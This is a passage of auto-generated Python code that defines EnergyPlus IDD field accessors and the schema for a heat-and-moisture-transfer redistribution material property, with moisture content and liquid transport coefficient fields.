@liquid_transport_coefficient_14.setter
def liquid_transport_coefficient_14(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 14`"""
self["Liquid Transport Coefficient 14"] = value
@property
def moisture_content_15(self):
"""field `Moisture Content 15`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_15` or None if not set
"""
return self["Moisture Content 15"]
@moisture_content_15.setter
def moisture_content_15(self, value=None):
"""Corresponds to IDD field `Moisture Content 15`"""
self["Moisture Content 15"] = value
@property
def liquid_transport_coefficient_15(self):
"""field `Liquid Transport Coefficient 15`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_15` or None if not set
"""
return self["Liquid Transport Coefficient 15"]
@liquid_transport_coefficient_15.setter
def liquid_transport_coefficient_15(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 15`"""
self["Liquid Transport Coefficient 15"] = value
@property
def moisture_content_16(self):
"""field `Moisture Content 16`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_16` or None if not set
"""
return self["Moisture Content 16"]
@moisture_content_16.setter
def moisture_content_16(self, value=None):
"""Corresponds to IDD field `Moisture Content 16`"""
self["Moisture Content 16"] = value
@property
def liquid_transport_coefficient_16(self):
"""field `Liquid Transport Coefficient 16`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_16` or None if not set
"""
return self["Liquid Transport Coefficient 16"]
@liquid_transport_coefficient_16.setter
def liquid_transport_coefficient_16(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 16`"""
self["Liquid Transport Coefficient 16"] = value
@property
def moisture_content_17(self):
"""field `Moisture Content 17`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_17` or None if not set
"""
return self["Moisture Content 17"]
@moisture_content_17.setter
def moisture_content_17(self, value=None):
"""Corresponds to IDD field `Moisture Content 17`"""
self["Moisture Content 17"] = value
@property
def liquid_transport_coefficient_17(self):
"""field `Liquid Transport Coefficient 17`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_17` or None if not set
"""
return self["Liquid Transport Coefficient 17"]
@liquid_transport_coefficient_17.setter
def liquid_transport_coefficient_17(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 17`"""
self["Liquid Transport Coefficient 17"] = value
@property
def moisture_content_18(self):
"""field `Moisture Content 18`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_18` or None if not set
"""
return self["Moisture Content 18"]
@moisture_content_18.setter
def moisture_content_18(self, value=None):
"""Corresponds to IDD field `Moisture Content 18`"""
self["Moisture Content 18"] = value
@property
def liquid_transport_coefficient_18(self):
"""field `Liquid Transport Coefficient 18`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_18` or None if not set
"""
return self["Liquid Transport Coefficient 18"]
@liquid_transport_coefficient_18.setter
def liquid_transport_coefficient_18(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 18`"""
self["Liquid Transport Coefficient 18"] = value
@property
def moisture_content_19(self):
"""field `Moisture Content 19`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_19` or None if not set
"""
return self["Moisture Content 19"]
@moisture_content_19.setter
def moisture_content_19(self, value=None):
"""Corresponds to IDD field `Moisture Content 19`"""
self["Moisture Content 19"] = value
@property
def liquid_transport_coefficient_19(self):
"""field `Liquid Transport Coefficient 19`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_19` or None if not set
"""
return self["Liquid Transport Coefficient 19"]
@liquid_transport_coefficient_19.setter
def liquid_transport_coefficient_19(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 19`"""
self["Liquid Transport Coefficient 19"] = value
@property
def moisture_content_20(self):
"""field `Moisture Content 20`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_20` or None if not set
"""
return self["Moisture Content 20"]
@moisture_content_20.setter
def moisture_content_20(self, value=None):
"""Corresponds to IDD field `Moisture Content 20`"""
self["Moisture Content 20"] = value
@property
def liquid_transport_coefficient_20(self):
"""field `Liquid Transport Coefficient 20`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_20` or None if not set
"""
return self["Liquid Transport Coefficient 20"]
@liquid_transport_coefficient_20.setter
def liquid_transport_coefficient_20(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 20`"""
self["Liquid Transport Coefficient 20"] = value
@property
def moisture_content_21(self):
"""field `Moisture Content 21`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_21` or None if not set
"""
return self["Moisture Content 21"]
@moisture_content_21.setter
def moisture_content_21(self, value=None):
"""Corresponds to IDD field `Moisture Content 21`"""
self["Moisture Content 21"] = value
@property
def liquid_transport_coefficient_21(self):
"""field `Liquid Transport Coefficient 21`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_21` or None if not set
"""
return self["Liquid Transport Coefficient 21"]
@liquid_transport_coefficient_21.setter
def liquid_transport_coefficient_21(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 21`"""
self["Liquid Transport Coefficient 21"] = value
@property
def moisture_content_22(self):
"""field `Moisture Content 22`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_22` or None if not set
"""
return self["Moisture Content 22"]
@moisture_content_22.setter
def moisture_content_22(self, value=None):
"""Corresponds to IDD field `Moisture Content 22`"""
self["Moisture Content 22"] = value
@property
def liquid_transport_coefficient_22(self):
"""field `Liquid Transport Coefficient 22`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_22` or None if not set
"""
return self["Liquid Transport Coefficient 22"]
@liquid_transport_coefficient_22.setter
def liquid_transport_coefficient_22(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 22`"""
self["Liquid Transport Coefficient 22"] = value
@property
def moisture_content_23(self):
"""field `Moisture Content 23`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_23` or None if not set
"""
return self["Moisture Content 23"]
@moisture_content_23.setter
def moisture_content_23(self, value=None):
"""Corresponds to IDD field `Moisture Content 23`"""
self["Moisture Content 23"] = value
@property
def liquid_transport_coefficient_23(self):
"""field `Liquid Transport Coefficient 23`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_23` or None if not set
"""
return self["Liquid Transport Coefficient 23"]
@liquid_transport_coefficient_23.setter
def liquid_transport_coefficient_23(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 23`"""
self["Liquid Transport Coefficient 23"] = value
@property
def moisture_content_24(self):
"""field `Moisture Content 24`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_24` or None if not set
"""
return self["Moisture Content 24"]
@moisture_content_24.setter
def moisture_content_24(self, value=None):
"""Corresponds to IDD field `Moisture Content 24`"""
self["Moisture Content 24"] = value
@property
def liquid_transport_coefficient_24(self):
"""field `Liquid Transport Coefficient 24`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_24` or None if not set
"""
return self["Liquid Transport Coefficient 24"]
@liquid_transport_coefficient_24.setter
def liquid_transport_coefficient_24(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 24`"""
self["Liquid Transport Coefficient 24"] = value
@property
def moisture_content_25(self):
"""field `Moisture Content 25`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_25` or None if not set
"""
return self["Moisture Content 25"]
@moisture_content_25.setter
def moisture_content_25(self, value=None):
"""Corresponds to IDD field `Moisture Content 25`"""
self["Moisture Content 25"] = value
@property
def liquid_transport_coefficient_25(self):
"""field `Liquid Transport Coefficient 25`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_25` or None if not set
"""
return self["Liquid Transport Coefficient 25"]
@liquid_transport_coefficient_25.setter
def liquid_transport_coefficient_25(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 25`"""
self["Liquid Transport Coefficient 25"] = value
class MaterialPropertyHeatAndMoistureTransferRedistribution(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Redistribution`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between liquid transport coefficient and moisture content
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of redistribution points',
{'name': u'Number of Redistribution points',
'pyname': u'number_of_redistribution_points',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 1',
{'name': u'Liquid Transport Coefficient 1',
'pyname': u'liquid_transport_coefficient_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 2',
{'name': u'Liquid Transport Coefficient 2',
'pyname': u'liquid_transport_coefficient_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 3',
{'name': u'Liquid Transport Coefficient 3',
'pyname': u'liquid_transport_coefficient_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 4',
{'name': u'Liquid Transport Coefficient 4',
'pyname': u'liquid_transport_coefficient_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 5',
{'name': u'Liquid Transport Coefficient 5',
'pyname': u'liquid_transport_coefficient_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 6',
{'name': u'Liquid Transport Coefficient 6',
'pyname': u'liquid_transport_coefficient_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 7',
{'name': u'Liquid Transport Coefficient 7',
'pyname': u'liquid_transport_coefficient_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 8',
{'name': u'Liquid Transport Coefficient 8',
'pyname': u'liquid_transport_coefficient_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 9',
{'name': u'Liquid Transport Coefficient 9',
'pyname': u'liquid_transport_coefficient_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 10',
{'name': u'Liquid Transport Coefficient 10',
'pyname': u'liquid_transport_coefficient_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 11',
{'name': u'Liquid Transport Coefficient 11',
'pyname': u'liquid_transport_coefficient_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 12',
{'name': u'Liquid Transport Coefficient 12',
'pyname': u'liquid_transport_coefficient_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 13',
{'name': u'Liquid Transport Coefficient 13',
'pyname': u'liquid_transport_coefficient_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 14',
{'name': u'Liquid Transport Coefficient 14',
'pyname': u'liquid_transport_coefficient_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 15',
{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 15',
{'name': u'Liquid Transport Coefficient 15',
'pyname': u'liquid_transport_coefficient_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 16',
{'name': u'Liquid Transport Coefficient 16',
'pyname': u'liquid_transport_coefficient_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 17',
{'name': u'Liquid Transport Coefficient 17',
'pyname': u'liquid_transport_coefficient_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 18',
{'name': u'Liquid Transport Coefficient 18',
'pyname': u'liquid_transport_coefficient_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 19',
{'name': u'Liquid Transport Coefficient 19',
'pyname': u'liquid_transport_coefficient_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 20',
{'name': u'Liquid Transport Coefficient 20',
'pyname': u'liquid_transport_coefficient_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 21',
{'name': u'Liquid Transport Coefficient 21',
'pyname': u'liquid_transport_coefficient_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 22',
{'name': u'Liquid Transport Coefficient 22',
'pyname': u'liquid_transport_coefficient_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 23',
{'name': u'Liquid Transport Coefficient 23',
'pyname': u'liquid_transport_coefficient_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 24',
{'name': u'Liquid Transport Coefficient 24',
'pyname': u'liquid_transport_coefficient_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 25',
{'name': u'Liquid Transport Coefficient 25',
'pyname': u'liquid_transport_coefficient_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Redistribution',
'pyname': u'MaterialPropertyHeatAndMoistureTransferRedistribution',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Moisture Material Name that the moisture properties will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_redistribution_points(self):
"""field `Number of Redistribution points`
| number of data points
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Redistribution points`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_redistribution_points` or None if not set
"""
return self["Number of Redistribution points"]
@number_of_redistribution_points.setter
def number_of_redistribution_points(self, value=None):
"""Corresponds to IDD field `Number of Redistribution points`"""
self["Number of Redistribution points"] = value
@property
def moisture_content_1(self):
"""field `Moisture Content 1`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_1` or None if not set
"""
return self["Moisture Content 1"]
@moisture_content_1.setter
def moisture_content_1(self, value=None):
"""Corresponds to IDD field `Moisture Content 1`"""
self["Moisture Content 1"] = value
@property
def liquid_transport_coefficient_1(self):
"""field `Liquid Transport Coefficient 1`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_1` or None if not set
"""
return self["Liquid Transport Coefficient 1"]
@liquid_transport_coefficient_1.setter
def liquid_transport_coefficient_1(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 1`"""
self["Liquid Transport Coefficient 1"] = value
@property
def moisture_content_2(self):
"""field `Moisture Content 2`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_2` or None if not set
"""
return self["Moisture Content 2"]
@moisture_content_2.setter
def moisture_content_2(self, value=None):
"""Corresponds to IDD field `Moisture Content 2`"""
self["Moisture Content 2"] = value
@property
def liquid_transport_coefficient_2(self):
"""field `Liquid Transport Coefficient 2`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_2` or None if not set
"""
return self["Liquid Transport Coefficient 2"]
@liquid_transport_coefficient_2.setter
def liquid_transport_coefficient_2(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 2`"""
self["Liquid Transport Coefficient 2"] = value
@property
def moisture_content_3(self):
"""field `Moisture Content 3`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_3` or None if not set
"""
return self["Moisture Content 3"]
@moisture_content_3.setter
def moisture_content_3(self, value=None):
"""Corresponds to IDD field `Moisture Content 3`"""
self["Moisture Content 3"] = value
@property
def liquid_transport_coefficient_3(self):
"""field `Liquid Transport Coefficient 3`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_3` or None if not set
"""
return self["Liquid Transport Coefficient 3"]
@liquid_transport_coefficient_3.setter
def liquid_transport_coefficient_3(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 3`"""
self["Liquid Transport Coefficient 3"] = value
@property
def moisture_content_4(self):
"""field `Moisture Content 4`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_4` or None if not set
"""
return self["Moisture Content 4"]
@moisture_content_4.setter
def moisture_content_4(self, value=None):
"""Corresponds to IDD field `Moisture Content 4`"""
self["Moisture Content 4"] = value
@property
def liquid_transport_coefficient_4(self):
"""field `Liquid Transport Coefficient 4`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_4` or None if not set
"""
return self["Liquid Transport Coefficient 4"]
@liquid_transport_coefficient_4.setter
def liquid_transport_coefficient_4(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 4`"""
self["Liquid Transport Coefficient 4"] = value
@property
def moisture_content_5(self):
"""field `Moisture Content 5`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_5` or None if not set
"""
return self["Moisture Content 5"]
@moisture_content_5.setter
def moisture_content_5(self, value=None):
"""Corresponds to IDD field `Moisture Content 5`"""
self["Moisture Content 5"] = value
@property
def liquid_transport_coefficient_5(self):
"""field `Liquid Transport Coefficient 5`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_5` or None if not set
"""
return self["Liquid Transport Coefficient 5"]
@liquid_transport_coefficient_5.setter
def liquid_transport_coefficient_5(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 5`"""
self["Liquid Transport Coefficient 5"] = value
@property
def moisture_content_6(self):
"""field `Moisture Content 6`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_6` or None if not set
"""
return self["Moisture Content 6"]
@moisture_content_6.setter
def moisture_content_6(self, value=None):
"""Corresponds to IDD field `Moisture Content 6`"""
self["Moisture Content 6"] = value
@property
def liquid_transport_coefficient_6(self):
"""field `Liquid Transport Coefficient 6`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_6` or None if not set
"""
return self["Liquid Transport Coefficient 6"]
@liquid_transport_coefficient_6.setter
def liquid_transport_coefficient_6(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 6`"""
self["Liquid Transport Coefficient 6"] = value
@property
def moisture_content_7(self):
"""field `Moisture Content 7`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_7` or None if not set
"""
return self["Moisture Content 7"]
@moisture_content_7.setter
def moisture_content_7(self, value=None):
"""Corresponds to IDD field `Moisture Content 7`"""
self["Moisture Content 7"] = value
@property
def liquid_transport_coefficient_7(self):
"""field `Liquid Transport Coefficient 7`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_7` or None if not set
"""
return self["Liquid Transport Coefficient 7"]
@liquid_transport_coefficient_7.setter
def liquid_transport_coefficient_7(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 7`"""
self["Liquid Transport Coefficient 7"] = value
@property
def moisture_content_8(self):
"""field `Moisture Content 8`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_8` or None if not set
"""
return self["Moisture Content 8"]
@moisture_content_8.setter
def moisture_content_8(self, value=None):
"""Corresponds to IDD field `Moisture Content 8`"""
self["Moisture Content 8"] = value
@property
def liquid_transport_coefficient_8(self):
"""field `Liquid Transport Coefficient 8`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_8` or None if not set
"""
return self["Liquid Transport Coefficient 8"]
